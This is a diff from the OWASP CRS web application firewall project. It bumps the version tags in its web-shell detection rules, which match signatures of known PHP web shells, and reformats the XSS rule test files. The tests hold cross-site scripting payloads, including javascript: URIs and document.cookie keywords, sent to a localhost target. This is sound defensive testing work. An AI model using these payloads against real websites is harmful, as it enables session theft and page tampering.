"END-RESPONSE-954-DATA-LEAKAGES-IIS" diff --git a/rules/@owasp_crs/RESPONSE-955-WEB-SHELLS.conf b/rules/@owasp_crs/RESPONSE-955-WEB-SHELLS.conf index 2097c7c..90cc991 100644 --- a/rules/@owasp_crs/RESPONSE-955-WEB-SHELLS.conf +++ b/rules/@owasp_crs/RESPONSE-955-WEB-SHELLS.conf @@ -1,5 +1,5 @@ # ------------------------------------------------------------------------ -# OWASP CRS ver.4.4.0 +# OWASP CRS ver.4.5.0 # Copyright (c) 2006-2020 Trustwave and contributors. (not) All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # @@ -13,10 +13,10 @@ SecRule RESPONSE_HEADERS:Content-Encoding "@pm gzip compress deflate br zstd" \ pass,\ nolog,\ tag:'OWASP_CRS',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ skipAfter:END-RESPONSE-955-WEB-SHELLS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" -SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.4.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955011,phase:3,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:955012,phase:4,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.5.0',skipAfter:END-RESPONSE-955-WEB-SHELLS" SecRule RESPONSE_BODY "@pmFromFile web-shells-php.data" \ "id:955100,\ phase:4,\ @@ -31,7 +31,7 @@ SecRule RESPONSE_BODY "@pmFromFile web-shells-php.data" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx (r57 Shell Version [0-9.]+|r57 shell)" \ @@ -48,7 +48,7 @@ SecRule RESPONSE_BODY "@rx (r57 Shell Version [0-9.]+|r57 tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx ^<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'><title>.*? - WSO [0-9.]+" \ @@ -65,7 +65,7 @@ SecRule RESPONSE_BODY "@rx ^.*" \ @@ -82,7 +82,7 @@ SecRule RESPONSE_BODY "@rx B4TM4N SH3LL.*Mini Shell.*Developed By LameHacker" \ @@ -99,7 +99,7 @@ SecRule RESPONSE_BODY "@rx Mini Shell.*Developed By LameHacker" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx \.:: .* ~ Ashiyane V [0-9.]+ ::\." \ @@ -116,7 +116,7 @@ SecRule RESPONSE_BODY "@rx \.:: .* ~ Ashiyane V [0-9.]+ ::\." \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx Symlink_Sa [0-9.]+" \ @@ -133,7 +133,7 @@ SecRule RESPONSE_BODY "@rx Symlink_Sa [0-9.]+" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx CasuS [0-9.]+ by MafiABoY" \ @@ -150,7 +150,7 @@ SecRule RESPONSE_BODY "@rx CasuS [0-9.]+ by MafiABoY" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx ^\r\n\r\nGRP WebShell [0-9.]+ " \ @@ -167,7 +167,7 @@ SecRule RESPONSE_BODY "@rx ^<html>\r\n<head>\r\n<title>GRP WebShell [0-9.]+ " \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx <small>NGHshell [0-9.]+ by Cr4sh</body></html>\n$" \ @@ -184,7 +184,7 @@ SecRule RESPONSE_BODY "@rx <small>NGHshell [0-9.]+ by Cr4sh</body></html>\n$" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx <title>SimAttacker - (?:Version|Vrsion) : [0-9.]+ - " \ @@ -201,7 +201,7 @@ SecRule RESPONSE_BODY "@rx <title>SimAttacker - (?:Version|Vrsion) : [0-9.]+ - " tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx ^<!DOCTYPE html>\n<html>\n<!-- By Artyum .*<title>Web Shell" \ @@ -218,7 +218,7 @@ SecRule RESPONSE_BODY "@rx ^\n\n" \ @@ -269,7 +269,7 @@ SecRule RESPONSE_BODY "@rx ^PHP Web Shell\r\n\r\n\r\n tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx ^\n\n
Input command :
\n
" \ @@ -286,7 +286,7 @@ SecRule RESPONSE_BODY "@rx ^\n\n
\n\nRu24PostWebShell " \ @@ -303,7 +303,7 @@ SecRule RESPONSE_BODY "@rx ^<html>\n<head>\n<title>Ru24PostWebShell " \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx <title>s72 Shell v[0-9.]+ Codinf by Cr@zy_King" \ @@ -320,7 +320,7 @@ SecRule RESPONSE_BODY "@rx s72 Shell v[0-9.]+ Codinf by Cr@zy_King\r\n\r\n\r\nPhpSpy Ver [0-9]+" \ @@ -337,7 +337,7 @@ SecRule RESPONSE_BODY "@rx ^\r\n\r\n\n\n\n\ng00nshell v[0-9.]+ " \ @@ -354,7 +354,7 @@ SecRule RESPONSE_BODY "@rx ^ <html>\n\n<head>\n\n<title>g00nshell v[0-9.]+ " \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@contains <title>punkholicshell" \ @@ -371,7 +371,7 @@ SecRule RESPONSE_BODY "@contains punkholicshell" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx ^\n \n azrail [0-9.]+ by C-W-M" \ @@ -388,7 +388,7 @@ SecRule RESPONSE_BODY "@rx ^\n \n azrail [0- tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx >SmEvK_PaThAn Shell v[0-9]+ coded by <a href=" \ @@ -405,7 +405,7 @@ SecRule RESPONSE_BODY "@rx >SmEvK_PaThAn Shell v[0-9]+ coded by <a href=" \ tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/122/17/650',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.outbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule RESPONSE_BODY "@rx ^<html>\n<title>.*? ~ Shell I\n\n" - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "payload=javascript:/*-->" + version: "HTTP/1.1" + output: + log: + expect_ids: [941170] + - test_id: 3 desc: 'Test first backslash match (javascript:(?:[\s\S]+[=\x5c\(\[\.<]) with: javascript: \\\\t (extra backslashes to work around rule transformations)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?var=javascript:%20%5C%5C%5C%5Ct" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?var=javascript:%20%5C%5C%5C%5Ct" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log: + expect_ids: [941170] + - test_id: 4 desc: 'Test second backslash match (javascript:(?:...|\x5c[ux]\d)) with: javascript:\\\\u0020 (extra backslashes to work around rule transformations)' stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?var=javascript:%5C%5C%5C%5Cu0020" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" - - test_title: 941170-5 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?var=javascript:%5C%5C%5C%5Cu0020" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log: + expect_ids: [941170] + - test_id: 5 desc: "Status Page Test - data: , as GET variable" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get?test=%20data%3A%20%2C%20%3Cx%3E" - headers: - Accept: "*/*" - User-Agent: "OWASP CRS test agent" - Host: localhost - version: "HTTP/1.1" - output: - log_contains: id "941170" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get?test=%20data%3A%20%2C%20%3Cx%3E" + headers: + Accept: "*/*" + User-Agent: "OWASP CRS test agent" + Host: localhost + version: "HTTP/1.1" + output: + log: + expect_ids: [941170] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml index ba33b77..a6a7c74 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941180.yaml @@ -1,125 +1,123 @@ --- meta: author: "zmallen, azurit" - enabled: true - name: "941180.yaml" - description: "Tests to trigger, or not trigger 941180" +rule_id: 941180 tests: - - test_title: 941180-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941180-1=window.location' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941180-1=window.location' + version: "HTTP/1.1" + output: + log: + expect_ids: [941180] + - test_id: 2 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'document.cookie=941180-2' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'document.cookie=941180-2' + version: "HTTP/1.1" + output: + log: + expect_ids: [941180] + - test_id: 3 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: 'window.location=941180-3' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: 'window.location=941180-3' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941180] + - test_id: 4 desc: Negative test for Node-validator deny list keyword -->, present in stricter sibling 941181, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941180-4=-->' - version: "HTTP/1.1" - output: - no_log_contains: id "941180" - - test_title: 941180-5 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941180-4=-->' + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941180] + - test_id: 5 desc: "XSS with embedded shell execution attempt (batch script)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=\"-->'-->`-->" - version: HTTP/1.0 - output: - log_contains: id "941180" - - test_title: 941180-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=\"-->'-->`-->" + version: HTTP/1.0 + output: + log: + expect_ids: [941180] + - test_id: 6 desc: "Node-validator deny list keywords, ARGS, issue #2512" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'arg=...(document.domain)...' - version: "HTTP/1.1" - output: - log_contains: id "941180" - - test_title: 941180-7 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'arg=...(document.domain)...' + version: "HTTP/1.1" + output: + log: + expect_ids: [941180] + - test_id: 7 desc: "We should not trigger on REQUEST_FILENAME without special characters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/javascript-manual/document.cookie" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: id "941180" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/javascript-manual/document.cookie" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [941180] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml index a6f3217..ff74716 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941181.yaml @@ -1,75 +1,73 @@ --- meta: author: "Paul Beckett, azurit" - enabled: true - name: "941181.yaml" - description: "Tests to trigger, or not trigger 941180" +rule_id: 941181 tests: - - test_title: 941181-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941181-1=-->' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941181-1=-->' + version: "HTTP/1.1" + output: + log: + expect_ids: [941181] + - test_id: 2 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/foo" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '941181-1=--%3E' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/foo" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '941181-1=--%3E' + version: "HTTP/1.1" + output: + log: + expect_ids: [941181] + - test_id: 3 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post/bar" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: '-->=941181-3' - version: "HTTP/1.1" - output: - log_contains: id "941181" - - test_title: 941181-4 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post/bar" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: '-->=941181-3' + version: "HTTP/1.1" + output: + log: + expect_ids: [941181] + - test_id: 4 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: '-->=941181-4' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941181" + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '-->=941181-4' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941181] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml index 6b0f1e2..d41e2d4 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941190.yaml @@ -1,92 +1,90 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "941190.yaml" - description: "Tests to trigger, or not trigger 941190" +rule_id: 941190 tests: - - test_title: 941190-1 + - test_id: 1 desc: Node-validator deny list keywords, ARGS stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "941190-1=" - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-2 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "941190-1=" + version: "HTTP/1.1" + output: + log: + expect_ids: [941190] + - test_id: 2 desc: Node-validator deny list keywords, ARGS_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: POST - port: 80 - uri: "/post" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "x=" - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-3 + - input: + dest_addr: 127.0.0.1 + method: POST + port: 80 + uri: "/post" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "x=" + version: "HTTP/1.1" + output: + log: + expect_ids: [941190] + - test_id: 3 desc: Node-validator deny list keywords, COOKIES_NAMES stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get/baz" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: '' - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: id "941190" - - test_title: 941190-4 + - input: + dest_addr: 127.0.0.1 + method: GET + port: 80 + uri: "/get/baz" + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Cookie: '' + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [941190] + - test_id: 4 desc: Test first replaced backslash match (\x5c) stages: - - stage: - input: - dest_addr: 127.0.0.1 - method: GET - port: 80 - uri: "/get" - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Cookie: 'My-Cookie=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941230" - - test_title: 941230-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [941230] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "payload=" - version: HTTP/1.0 - output: - log_contains: id "941230" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log: + expect_ids: [941230] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml index b77c0de..6bd84e2 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941240.yaml @@ -1,39 +1,37 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941240.yaml +rule_id: 941240 tests: - - test_title: 941240-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?var=%3c%3fimport%20implementation%20%3d" - version: HTTP/1.0 - output: - log_contains: id "941240" - - test_title: 941240-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?var=%3c%3fimport%20implementation%20%3d" + version: HTTP/1.0 + output: + log: + expect_ids: [941240] + - test_id: 2 desc: "Status Page Test - IE XSS Filter " - version: HTTP/1.0 - output: - log_contains: id "941250" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "payload=" + version: HTTP/1.0 + output: + log: + expect_ids: [941250] diff --git a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml index d7e14f5..1cc0cb1 100644 --- a/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml +++ b/tests/REQUEST-941-APPLICATION-ATTACK-XSS/941260.yaml @@ -1,41 +1,39 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None - enabled: true - name: 941260.yaml +rule_id: 941260 tests: - - test_title: 941260-1 + - test_id: 1 desc: "IE XSS Filters" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=&var2=whatever" - version: HTTP/1.0 - output: - log_contains: id "941260" - - test_title: 941260-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=&var2=whatever" + version: HTTP/1.0 + output: + log: + expect_ids: [941260] + - test_id: 2 desc: "XSS test based on portswigger XSS cheatsheet" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - 